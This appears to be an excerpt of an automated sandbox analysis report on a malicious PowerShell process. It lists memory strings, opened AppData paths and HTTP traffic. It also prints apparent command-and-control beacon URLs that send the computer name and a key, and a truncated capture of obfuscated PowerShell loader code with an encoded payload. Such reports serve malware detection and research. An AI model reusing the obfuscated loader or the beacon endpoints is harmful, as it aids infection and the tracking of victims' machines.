Source: | Binary string: CallSite.Target.pdb source: powershell.exe, 00000000.00000002.16359729485.000002124B9DF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: utomation.pdb3 source: powershell.exe, 00000000.00000002.16360613097.000002124BDA8000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.16357201872.000002124B6F6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.16358435569.000002124B887000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.16360613097.000002124BDA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.16357201872.000002124B660000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: jon.pdb source: powershell.exe, 00000000.00000002.16359729485.000002124B9DF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ion.pdb source: powershell.exe, 00000000.00000002.16358435569.000002124B887000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: b.pdb+ source: powershell.exe, 00000000.00000002.16360613097.000002124BDA8000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIG9irsGIjDMJQdYLyBrpGW9VRtIttUXh2mUUUy-UQHaNQmPDOcdsnoUwXBVZ0wNPOjJpGoCfSsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=qViwf3Al3CvTSChjsbbzcWUYoR0Pf7Mubkp6T-W8TifoIw03bQjOcFpE7nBorYHQdYROJiKrGjNz0gjv_Dh5nppWIiW43uNU6U6c1V2EjmawyEtDrnfxfQN1efPUOYnZQpl-bBzi9tVh0JAnrHZovzUeGYefklXIUOsD1KEgeKYzhNuvmUwJoadWz4dJjWCGDf44yA |
Source: powershell.exe, 00000000.00000002.16332473845.0000021234A78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$qk5wjl6yzt4v820/$e5j0dwvqihncl7r.php? |
Source: powershell.exe, 00000000.00000002.16332473845.0000021234EBC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$qk5wjl6yzt4v820/$e5j0dwvqihncl7r.php?id=$env:computernam |
Source: powershell.exe, 00000000.00000002.16332473845.000002123372B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.16332473845.0000021234EBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.16332473845.0000021234901000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$qk5wjl6yzt4v820/$e5j0dwvqihncl7r.php?id=$env:computername&key=$ydeuxqgnkl&s=527 |
Source: powershell.exe, 00000000.00000002.16332473845.0000021233DC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.16332473845.000002123460A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.16332473845.00000212348E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000000.00000002.16332473845.000002123460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/57fd316pguhtr.php?id=computer&key=75439930857&s=527 |
Source: powershell.exe, 00000000.00000002.16332473845.000002123460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/57fd316pguhtr.php?id=computer&key=75439930857&s=527p |
Source: powershell.exe, 00000000.00000002.16357201872.000002124B660000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.16357201872.000002124B660000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.16359729485.000002124B988000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic |
Source: powershell.exe, 00000000.00000002.16350742775.00000212435C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.16332473845.000002123372B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.16332473845.000002123372B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzo |
Source: powershell.exe, 00000000.00000002.16332473845.000002123372B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.16332473845.0000021234EBC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.16332473845.0000021233551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.16332473845.000002123372B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.16332473845.0000021234EBC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.16332473845.000002123372B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.16332473845.000002123372B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzo |
Source: powershell.exe, 00000000.00000002.16332473845.00000212348E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.16332473845.00000212348E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.16332473845.0000021234901000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZjNGIG9irsGIjDMJQdYLyBrpGW9VRtIttUXh2mUUUy-UQHaNQmPDOcdsnoUwXBVZ0wNPOj |
Source: powershell.exe, 00000000.00000002.16332473845.000002123440F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.16332473845.00000212348E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIG9irsGIjDMJQdYLyBrpGW9 |
Source: powershell.exe, 00000000.00000002.16358435569.000002124B887000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.cc |
Source: powershell.exe, 00000000.00000002.16358435569.000002124B887000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.coz |
Source: powershell.exe, 00000000.00000002.16357201872.000002124B660000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.16332473845.0000021233551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.16350742775.00000212435C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.16350742775.00000212435C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.16350742775.00000212435C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.16332473845.00000212348E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.16332473845.000002123372B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.16332473845.000002123372B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXzo |
Source: powershell.exe, 00000000.00000002.16358435569.000002124B940000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.535 |
Source: powershell.exe, 00000000.00000002.16350742775.00000212435C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.16357201872.000002124B660000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.16332473845.0000021234424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.16332473845.0000021234901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.16332473845.00000212348E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $wvqcd1fp09h2lk5.(([char[]]@((159862/(15439806/(7189-718))),(-10100+10211),(6665-6553),(8972-(7992453/903)),(5689-(24292070/4334)),(-4214+(15193725/(11861-(79080604/(-339+(12880-3068))))))) -join ''))( $mati7gslebzhf3r ) $wvqcd1fp09h2lk5.((-join (@((117049/(11023-9276)),(2005-(8972-(22300400/3152))),(8833-8722),(-122+(8734-8497)),(5506-5405))| ForEach-Object { [char]$_ })))()$1v5lesgp490jti3.((-join (@((73164/(3425604/3137)),(743040/(7506080/1091)),(518703/4673),(4406-(22175888/5168)),(2008-(4657-(6944-(31+(10222-6059))))))| ForEach-Object { [char]$_ })))()[byte[]] $v64lm2aeq9niujw = $mati7gslebzhf3r.(([system.String]::new(@((605472/(55804336/(16038-(2348+(1292+(9169-4513)))))),(-9335+9446),(-1142+(-265+(-4831+(9847-3544)))),(9419-(5036+(-3253+7522))),(9135-(23265159/2579)),(1663-(6060-(942+(12667-(-813+(5363+4565)))))),(597740/4940)))))() $aqbuyivrcl7d9kn=$v64lm2aeq9niujw return $aqbuyivrcl7d9kn}[System.Text.Encoding]::ascii.((-join (@((372040/(31115120/5938)),(584184/(6512784/(6383-(8278-(7933146/(3693-1067)))))),(905-(10115-(10050-724))),(-9790+(6570+3303)),(-9269+9385),(-1690+1804),(-319+(638-(1060-(-8399+(19291-(19179-(8659+474))))))),(253440/2304),(276967/2689))| ForEach-Object { [char]$_ })))((cp3ydoqxzm8tisaj71h9f40lgnv "du84cWdzMm0zdpvrMgssJhW0rU73qVcQWd8DGNCJ7kIh8jKoDZekLEcN+u5WcgJF20xh5SvioIj8AfmfNsO3VwKi0HeGe33SD95/7jSGjTliCcCQWp/HmdzAZbIp6UuJn631+hAkveLBSdo/x0p/LvrsjleIqskAkIzYjb6I4XJoKQuPiInjwnD8hZKOyaqPgpFvL9oPTxiOyc6am5zCm6qd05vBAyge1hrDj6qWzIj02RhfJ6uPioG4HaLAmYCP37n+yGJM13P9mL0dYln/vNC/3QqoBKvGoJ8M9vuvfFIcSMLZbZrEtFHUrosrJdOH1NLmsrU4PZtikRSv5EqFnz0ohFiSRpFkuiqnuKq+mxmMFjwBs+LSicF8eYHqnSVR3Hjsw2pexVTgGAG/RCNm6xKAIHHIW6+fgstSXbscfPPsoNQE8nmrgZK6gY682YmJL6sp7PjhgSLAJPzEnLiAvUbdvbt8fspAnvxXXwq4WsNOIaHdnsEHyu4NaB9a+PPF85gsG9b8VDpOnHPPsT7jlYp6QQjIBNiKFK5MpEq6CwBHhZOG1bBqHEDxvT47J62pOvqH1NV7baZlLF5MpAJOj42HTp7QSdnGihOsrwHoyqer9Ns5pMnUzfOvR0kGkCBtUg4H6nQoCcj7oMYxh38zZum+rFEPQVs7DqkR58fU2zGdwZOJ94gEywTQSNmauLvdZ8q2tzbDBVzgTlkrnYhgv1xI03UOt4RUFwzveEmDQts+02BG0TD1KocNXjfHwMipHpKw1nnYUBqCXNkiRAijgr4l9Op0LIx/dZb/6tjNiJW4laUXmruPDNlMi7HLwodTloLYDlDMgv34aIoJHh5JgwsIRhRGw+mNnb2zDp2aRJNbkMuH8seXtgAcxNJbCAwKlgBPhKSE7fCITq1uBtLqLHArVuG6ZXsBXguH8Mo4dqSFu+en4JlVtkFOUSbbPcL6QSauWcuXdk95JF9djsyNm3skfEDbsAn/X7tunegsDrfLBOGi3ZS/3ctWhLKGKYu8IzH1As3f/niFxiPeVBd44JuT9OQyqdUWDe0XyPJ1jJh9ahjuOrTT5H/n4tgNqxi2V5XI35T0LtHqSgImO0bJy4Ia0SHjzOuR9usMMAboisUUKxHmdzxfchYVUOoHA7Yxg9VNwSCPR |